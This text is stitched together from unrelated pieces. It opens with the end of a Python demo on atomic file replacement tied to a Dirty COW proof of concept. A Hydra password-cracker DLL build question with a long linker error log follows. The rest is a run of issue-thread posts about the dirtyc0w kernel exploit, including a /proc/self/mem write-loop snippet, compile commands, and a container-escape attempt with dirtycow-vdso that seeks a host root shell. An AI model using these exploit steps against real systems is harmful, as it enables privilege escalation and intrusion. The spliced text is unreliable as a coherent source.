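        out["inode_changed"] = os.stat(target).st_ino != inode_before
        with open(target, "rb") as fh:
            out["contents"] = fh.read()

        # 3. The mitigation for (2) is directory permissions, not file mode: with the
        #    directory itself read-only, the rename is refused as well (again, except for root).
        staging2 = target + ".new2"
        with open(staging2, "wb") as fh:
            fh.write(b"second attempt\n")
        os.chmod(workdir, 0o555)
        try:
            os.replace(staging2, target)
            out["rename_denied_when_dir_locked"] = False
        except PermissionError:
            out["rename_denied_when_dir_locked"] = True
    finally:
        os.chmod(workdir, 0o755)           # make the tree deletable again before cleanup
        shutil.rmtree(workdir)
    return out


if __name__ == "__main__":
    for key, value in demo_replace_vs_write().items():
        print(f"{key:32} {value!r}")
```

So a 0404 file sitting in a directory the tester owns is not a meaningful test target for this bug: anything that can create and rename in that directory can swap the file without touching the protected inode. The interesting case, and the one the PoC recipe is really about, is a root-owned file in a root-owned directory such as /etc.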

build dll from Hydra Open source

Hi
I want to compile and build a DLL file from the Hydra open source code.
But after compiling and making the object file, when I want to link the object file I get so many errors, according to below:
hydra.o:hydra.c:(.text+0x838): undefined reference to hydra_address2string_beautiful' hydra.o:hydra.c:(.text+0x838): relocation truncated to fit: R_X86_64_PC32 against undefined symbol hydra_address2string_beautiful'
hydra.o:hydra.c:(.text+0x37e7): undefined reference to service_xmpp' hydra.o:hydra.c:(.text+0x37e7): relocation truncated to fit: R_X86_64_PC32 against undefined symbol service_xmpp'
hydra.o:hydra.c:(.text+0x833c): undefined reference to hydra_tobase64' hydra.o:hydra.c:(.text+0x833c): relocation truncated to fit: R_X86_64_PC32 against undefined symbol hydra_tobase64'
hydra.o:hydra.c:(.text+0x85a2): undefined reference to hydra_string_replace' hydra.o:hydra.c:(.text+0x85a2): relocation truncated to fit: R_X86_64_PC32 against undefined symbol hydra_string_replace'
hydra.o:hydra.c:(.text+0x85ff): undefined reference to hydra_string_replace' hydra.o:hydra.c:(.text+0x85ff): relocation truncated to fit: R_X86_64_PC32 against undefined symbol hydra_string_replace'
hydra.o:hydra.c:(.text+0x8665): undefined reference to hydra_string_replace' hydra.o:hydra.c:(.text+0x8665): relocation truncated to fit: R_X86_64_PC32 against undefined symbol hydra_string_replace'
hydra.o:hydra.c:(.text+0x86c5): undefined reference to hydra_string_replace' hydra.o:hydra.c:(.text+0x86c5): relocation truncated to fit: R_X86_64_PC32 against undefined symbol hydra_string_replace'
hydra.o:hydra.c:(.text+0x8722): undefined reference to hydra_string_replace' hydra.o:hydra.c:(.text+0x8722): relocation truncated to fit: R_X86_64_PC32 against undefined symbol hydra_string_replace'
hydra.o:hydra.c:(.text+0x8782): more undefined references to hydra_string_replace' follow hydra.o:hydra.c:(.text+0x8782): relocation truncated to fit: R_X86_64_PC32 against undefined symbol hydra_string_replace'
hydra.o:hydra.c:(.text+0x87e8): relocation truncated to fit: R_X86_64_PC32 against undefined symbol hydra_string_replace' hydra.o:hydra.c:(.text+0x884c): additional relocation overflows omitted from the output hydra.o:hydra.c:(.text+0xd005): undefined reference to hydra_strcasestr'
hydra.o:hydra.c:(.text+0xd027): undefined reference to hydra_strcasestr' hydra.o:hydra.c:(.text+0xee95): undefined reference to hydra_string_replace'
hydra.o:hydra.c:(.text+0x107e8): undefined reference to hydra_string_replace' hydra.o:hydra.c:(.text+0x1084b): undefined reference to hydra_string_replace'
hydra.o:hydra.c:(.text+0x115c5): undefined reference to usleepn' hydra.o:hydra.c:(.rdata+0x348): undefined reference to service_adam6500_init'
hydra.o:hydra.c:(.rdata+0x350): undefined reference to service_adam6500' hydra.o:hydra.c:(.rdata+0x368): undefined reference to service_asterisk_init'
hydra.o:hydra.c:(.rdata+0x370): undefined reference to service_asterisk' hydra.o:hydra.c:(.rdata+0x388): undefined reference to service_cisco_init'
hydra.o:hydra.c:(.rdata+0x390): undefined reference to service_cisco' hydra.o:hydra.c:(.rdata+0x398): undefined reference to usage_cisco'
hydra.o:hydra.c:(.rdata+0x3a8): undefined reference to service_cisco_enable_init' hydra.o:hydra.c:(.rdata+0x3b0): undefined reference to service_cisco_enable'
hydra.o:hydra.c:(.rdata+0x3b8): undefined reference to usage_cisco_enable' hydra.o:hydra.c:(.rdata+0x3c8): undefined reference to service_cvs_init'
hydra.o:hydra.c:(.rdata+0x3d0): undefined reference to service_cvs' hydra.o:hydra.c:(.rdata+0x3d8): undefined reference to usage_cvs'
hydra.o:hydra.c:(.rdata+0x3e8): undefined reference to service_ftp_init' hydra.o:hydra.c:(.rdata+0x3f0): undefined reference to service_ftp'
hydra.o:hydra.c:(.rdata+0x408): undefined reference to service_ftp_init' hydra.o:hydra.c:(.rdata+0x410): undefined reference to service_ftps'
hydra.o:hydra.c:(.rdata+0x428): undefined reference to service_http_init' hydra.o:hydra.c:(.rdata+0x430): undefined reference to service_http_get'
hydra.o:hydra.c:(.rdata+0x438): undefined reference to usage_http' hydra.o:hydra.c:(.rdata+0x448): undefined reference to service_http_form_init'
hydra.o:hydra.c:(.rdata+0x450): undefined reference to service_http_get_form' hydra.o:hydra.c:(.rdata+0x458): undefined reference to usage_http_form'
hydra.o:hydra.c:(.rdata+0x468): undefined reference to service_http_init' hydra.o:hydra.c:(.rdata+0x470): undefined reference to service_http_head'
hydra.o:hydra.c:(.rdata+0x488): undefined reference to service_http_form_init' hydra.o:hydra.c:(.rdata+0x498): undefined reference to usage_http_form'
hydra.o:hydra.c:(.rdata+0x4b0): undefined reference to service_http_post' hydra.o:hydra.c:(.rdata+0x4b8): undefined reference to usage_http'
hydra.o:hydra.c:(.rdata+0x4c8): undefined reference to service_http_form_init' hydra.o:hydra.c:(.rdata+0x4d0): undefined reference to service_http_post_form'
hydra.o:hydra.c:(.rdata+0x4d8): undefined reference to usage_http_form' hydra.o:hydra.c:(.rdata+0x4e8): undefined reference to service_http_proxy_init'
hydra.o:hydra.c:(.rdata+0x4f0): undefined reference to service_http_proxy' hydra.o:hydra.c:(.rdata+0x4f8): undefined reference to usage_http_proxy'
hydra.o:hydra.c:(.rdata+0x508): undefined reference to service_http_proxy_urlenum_init' hydra.o:hydra.c:(.rdata+0x510): undefined reference to service_http_proxy_urlenum'
hydra.o:hydra.c:(.rdata+0x518): undefined reference to usage_http_proxy_urlenum' hydra.o:hydra.c:(.rdata+0x528): undefined reference to service_icq_init'
hydra.o:hydra.c:(.rdata+0x530): undefined reference to service_icq' hydra.o:hydra.c:(.rdata+0x548): undefined reference to service_imap_init'
hydra.o:hydra.c:(.rdata+0x550): undefined reference to service_imap' hydra.o:hydra.c:(.rdata+0x558): undefined reference to usage_imap'
hydra.o:hydra.c:(.rdata+0x568): undefined reference to service_irc_init' hydra.o:hydra.c:(.rdata+0x570): undefined reference to service_irc'
hydra.o:hydra.c:(.rdata+0x578): undefined reference to usage_irc' hydra.o:hydra.c:(.rdata+0x588): undefined reference to service_ldap_init'
hydra.o:hydra.c:(.rdata+0x590): undefined reference to service_ldap2' hydra.o:hydra.c:(.rdata+0x598): undefined reference to usage_ldap'
hydra.o:hydra.c:(.rdata+0x5a8): undefined reference to service_ldap_init' hydra.o:hydra.c:(.rdata+0x5b0): undefined reference to service_ldap3'
hydra.o:hydra.c:(.rdata+0x5b8): undefined reference to usage_ldap' hydra.o:hydra.c:(.rdata+0x5c8): undefined reference to service_ldap_init'
hydra.o:hydra.c:(.rdata+0x5d0): undefined reference to service_ldap3_cram_md5' hydra.o:hydra.c:(.rdata+0x5d8): undefined reference to usage_ldap'
hydra.o:hydra.c:(.rdata+0x5e8): undefined reference to service_ldap_init' hydra.o:hydra.c:(.rdata+0x5f0): undefined reference to service_ldap3_digest_md5'
hydra.o:hydra.c:(.rdata+0x5f8): undefined reference to usage_ldap' hydra.o:hydra.c:(.rdata+0x608): undefined reference to service_mssql_init'
hydra.o:hydra.c:(.rdata+0x610): undefined reference to service_mssql' hydra.o:hydra.c:(.rdata+0x628): undefined reference to service_nntp_init'
hydra.o:hydra.c:(.rdata+0x630): undefined reference to service_nntp' hydra.o:hydra.c:(.rdata+0x638): undefined reference to usage_nntp'
hydra.o:hydra.c:(.rdata+0x648): undefined reference to service_pcanywhere_init' hydra.o:hydra.c:(.rdata+0x650): undefined reference to service_pcanywhere'
hydra.o:hydra.c:(.rdata+0x668): undefined reference to service_pcnfs_init' hydra.o:hydra.c:(.rdata+0x670): undefined reference to service_pcnfs'
hydra.o:hydra.c:(.rdata+0x688): undefined reference to service_pop3_init' hydra.o:hydra.c:(.rdata+0x690): undefined reference to service_pop3'
hydra.o:hydra.c:(.rdata+0x698): undefined reference to usage_pop3' hydra.o:hydra.c:(.rdata+0x6a8): undefined reference to service_redis_init'
hydra.o:hydra.c:(.rdata+0x6b0): undefined reference to service_redis' hydra.o:hydra.c:(.rdata+0x6c8): undefined reference to service_rexec_init'
hydra.o:hydra.c:(.rdata+0x6d0): undefined reference to service_rexec' hydra.o:hydra.c:(.rdata+0x6e8): undefined reference to service_rlogin_init'
hydra.o:hydra.c:(.rdata+0x6f0): undefined reference to service_rlogin' hydra.o:hydra.c:(.rdata+0x708): undefined reference to service_rsh_init'
hydra.o:hydra.c:(.rdata+0x710): undefined reference to service_rsh' hydra.o:hydra.c:(.rdata+0x728): undefined reference to service_rtsp_init'
hydra.o:hydra.c:(.rdata+0x730): undefined reference to service_rtsp' hydra.o:hydra.c:(.rdata+0x748): undefined reference to service_rpcap_init'
hydra.o:hydra.c:(.rdata+0x750): undefined reference to service_rpcap' hydra.o:hydra.c:(.rdata+0x768): undefined reference to service_s7_300_init'
hydra.o:hydra.c:(.rdata+0x770): undefined reference to service_s7_300' hydra.o:hydra.c:(.rdata+0x778): undefined reference to usage_s7_300'
hydra.o:hydra.c:(.rdata+0x788): undefined reference to service_smtp_init' hydra.o:hydra.c:(.rdata+0x790): undefined reference to service_smtp'
hydra.o:hydra.c:(.rdata+0x798): undefined reference to usage_smtp' hydra.o:hydra.c:(.rdata+0x7a8): undefined reference to service_smtp_enum_init'
hydra.o:hydra.c:(.rdata+0x7b0): undefined reference to service_smtp_enum' hydra.o:hydra.c:(.rdata+0x7b8): undefined reference to usage_smtp_enum'
hydra.o:hydra.c:(.rdata+0x7c8): undefined reference to service_snmp_init' hydra.o:hydra.c:(.rdata+0x7d0): undefined reference to service_snmp'
hydra.o:hydra.c:(.rdata+0x7d8): undefined reference to usage_snmp' hydra.o:hydra.c:(.rdata+0x7e8): undefined reference to service_socks5_init'
hydra.o:hydra.c:(.rdata+0x7f0): undefined reference to service_socks5' hydra.o:hydra.c:(.rdata+0x808): undefined reference to service_teamspeak_init'
hydra.o:hydra.c:(.rdata+0x810): undefined reference to service_teamspeak' hydra.o:hydra.c:(.rdata+0x828): undefined reference to service_telnet_init'
hydra.o:hydra.c:(.rdata+0x830): undefined reference to service_telnet' hydra.o:hydra.c:(.rdata+0x838): undefined reference to usage_telnet'
hydra.o:hydra.c:(.rdata+0x848): undefined reference to service_vmauthd_init' hydra.o:hydra.c:(.rdata+0x850): undefined reference to service_vmauthd'
hydra.o:hydra.c:(.rdata+0x868): undefined reference to service_vnc_init' hydra.o:hydra.c:(.rdata+0x870): undefined reference to service_vnc'
hydra.o:hydra.c:(.rdata+0x888): undefined reference to service_xmpp_init' hydra.o:hydra.c:(.rdata+0x898): undefined reference to usage_xmpp'
hydra.o:hydra.c:(.rdata$.refptr.do_retry[.refptr.do_retry]+0x0): undefined reference to do_retry' hydra.o:hydra.c:(.rdata$.refptr.colored_output[.refptr.colored_output]+0x0): undefined reference to colored_output'
hydra.o:hydra.c:(.rdata$.refptr.old_ssl[.refptr.old_ssl]+0x0): undefined reference to old_ssl' hydra.o:hydra.c:(.rdata$.refptr.quiet[.refptr.quiet]+0x0): undefined reference to quiet'
hydra.o:hydra.c:(.rdata$.refptr.selected_proxy[.refptr.selected_proxy]+0x0): undefined reference to selected_proxy' hydra.o:hydra.c:(.rdata$.refptr.found[.refptr.found]+0x0): undefined reference to found'
hydra.o:hydra.c:(.rdata$.refptr.proxy_string_port[.refptr.proxy_string_port]+0x0): undefined reference to proxy_string_port' hydra.o:hydra.c:(.rdata$.refptr.proxy_string_type[.refptr.proxy_string_type]+0x0): undefined reference to proxy_string_type'
hydra.o:hydra.c:(.rdata$.refptr.proxy_authentication[.refptr.proxy_authentication]+0x0): undefined reference to proxy_authentication' hydra.o:hydra.c:(.rdata$.refptr.proxy_string_ip[.refptr.proxy_string_ip]+0x0): undefined reference to proxy_string_ip'
hydra.o:hydra.c:(.rdata$.refptr.fe80[.refptr.fe80]+0x0): undefined reference to fe80' hydra.o:hydra.c:(.rdata$.refptr.use_proxy[.refptr.use_proxy]+0x0): undefined reference to use_proxy'
hydra.o:hydra.c:(.rdata$.refptr.proxy_count[.refptr.proxy_count]+0x0): undefined reference to proxy_count' hydra.o:hydra.c:(.rdata$.refptr.HYDRA_EXIT[.refptr.HYDRA_EXIT]+0x0): undefined reference to HYDRA_EXIT'
hydra.o:hydra.c:(.rdata$.refptr.cmdlinetarget[.refptr.cmdlinetarget]+0x0): undefined reference to cmdlinetarget' hydra.o:hydra.c:(.rdata$.refptr.port[.refptr.port]+0x0): undefined reference to port'
hydra.o:hydra.c:(.rdata$.refptr.waittime[.refptr.waittime]+0x0): undefined reference to waittime' hydra.o:hydra.c:(.rdata$.refptr.verbose[.refptr.verbose]+0x0): undefined reference to verbose'
hydra.o:hydra.c:(.rdata$.refptr.bf_options[.refptr.bf_options]+0x0): undefined reference to bf_options' hydra.o:hydra.c:(.rdata$.refptr.debug[.refptr.debug]+0x0): undefined reference to debug'
collect2: error: ld returned 1 exit status

No issue

Great site. Thanks. Hope it'll affect the attitude of some device-makers.
Made an app for Android, but there's your ported code working hundreds of times faster on Linux.
https://github.com/avs333/cve5195
YOU HAVE TO PATCH OR YOU'RE IN THE GEHENNA OTHERWISE

How do you compile this code, please? Any example... (Trying to compile for arm64-v8a)

Edit: Fairly certain this isn't for Android and won't compile as such...
gcc -pthread dirtyc0w.c -o dirtyc0w
gcc -pthread -pie dirtyc0w.c -o dirtyc0w
gcc -pthread -fpie dirtyc0w.c -o dirtyc0w
gcc -pthread -pie -fpie dirtyc0w.c -o dirtyc0w
(not executable: 64-bit ELF file)

Unless you know I'm wrong I believe this is designed for a different OS.

POC writes only 4 bytes of payload

Linux bright 4.6.2-1-ARCH #1 SMP PREEMPT Wed Jun 8 08:40:59 CEST 2016 x86_64 GNU/Linux

POC writes only 4 bytes of payload.

Also, it looks like

int f=open("/proc/self/mem",O_RDWR);
int i,c=0;
for(i=0;i<100000000;i++) {
lseek(f,map,SEEK_SET);
c+=write(f,str,10);
}
printf("procselfmem %d\n\n", c);
}

is ruining other internal processes, which are affected by this bug.

Error compiling exploit

gcc 5.3.0, musl libc 1.1.14

dirtyc0w.c:95:3: error: invalid use of undefined type 'struct stat'
   map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
   ^

Linus Commit Messages & The Exploit

Just trying to clarify a bit what happens; it is not very obvious for non-GCC experts.

Are we forcing the dirty bit to be set on a COW and that's forcing the write?

Compiled list of patches

Would it be possible to get, either in the wiki or in a gist attached to this page, a list of distros and the patched kernel version for each?

Was Dirty COW a regression?

I've heard that Dirty COW is a regression: it was fixed around 2005, but the fix was later reverted.
Can you confirm (with a link)?

Thanks!

"All the boring bugs are way more important" is misleading

In fact, all the boring normal bugs are way more important, just because there's a lot more of them. I don't think some spectacular security hole should be glorified or cared about as being any more "special" than a random spectacular crash due to bad locking.

This is... wrong. Really, horribly, terribly, dangerously wrong.

While I share no love for this new meme of cute sites and marketing names for security bugs, privilege escalation > denial of service, and that goes double at the kernel level. It's the difference between having your website defaced and having your customer data leaked or your machine joined to a botnet.

This is not equivalent to the other 5,000 bugs on CVE this year because:

  • It's kernel level
  • It's privilege escalation
  • It's been around for nine years
  • It's being exploited in the wild
  • Every OS vendor is treating this as deadly serious.

Please consider treating this bug with the respect it deserves. Your site, as written, could lead someone to believe that it's a non-issue.

Question: Source of the '100000000' in the loop for dirtyc0w.c

I've been unable to find a source for the loop iteration - is it just empirical? Is there any evidence this number of iterations is enough? Different hardware / architecture? I guess:

  • Fixed iterations → false negatives (declaring a system not vulnerable when it is in fact vulnerable)
  • Testing underlying file → infinite loop on invulnerable systems

Is there a version which tests whether the underlying file has been changed, perhaps reporting every 100000000 iterations? Just curious...

how to make exploit faster?

Thank you for your great project. I ran it successfully on my Ubuntu and I want to demo it in class. However, running ./dirtyc0w foo blablabla is really time-consuming. Could you please tell me how I can make it run faster?
Thank you

0xdeadbeef binary always ends up with Segment Fault error

I'm trying to escape the container and get a root shell on the host machine using https://github.com/gebl/dirtycow-docker-vdso (based on https://github.com/scumjr/dirtycow-vdso) to experiment with the PoC. This actually compiles the binary inside the container, but executing it ends with a Segmentation fault error.

root@7e6fad945815:/# cd dirtycow-vdso/

root@7e6fad945815:/dirtycow-vdso# make
nasm -f bin -o payload payload.s
xxd -i payload payload.h
cc -o 0xdeadbeef.o -c 0xdeadbeef.c -Wall
cc -o 0xdeadbeef 0xdeadbeef.o -lpthread

root@7e6fad945815:/dirtycow-vdso# ./0xdeadbeef 172.17.0.2:1234
[*] payload target: 172.17.0.2:1234
[*] exploit: patch 1/2
Segmentation fault

Host Machine Details: (VirtualBox 5.1.26 VM - Ubuntu 16.04.1)
Linux ubuntu-xenial 4.4.0-43-generic #63-Ubuntu SMP Wed Oct 12 13:48:03 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

Docker version 1.12.3, build 6b644ec

Container image Ubuntu 14.04.5 LTS

I have also tried compiling the binary on the host machine and copying it into the container, as well as downloading a pre-compiled binary from the wild and executing it inside the container. Also, I've tried kernel versions 4.4.0-21 and 4.4.0-31 on Ubuntu 16.04 server too. But all of them end up with the same error message, Segmentation fault. What am I doing wrong? Could someone please help in fixing this to escape the container and drop into a host machine root shell?
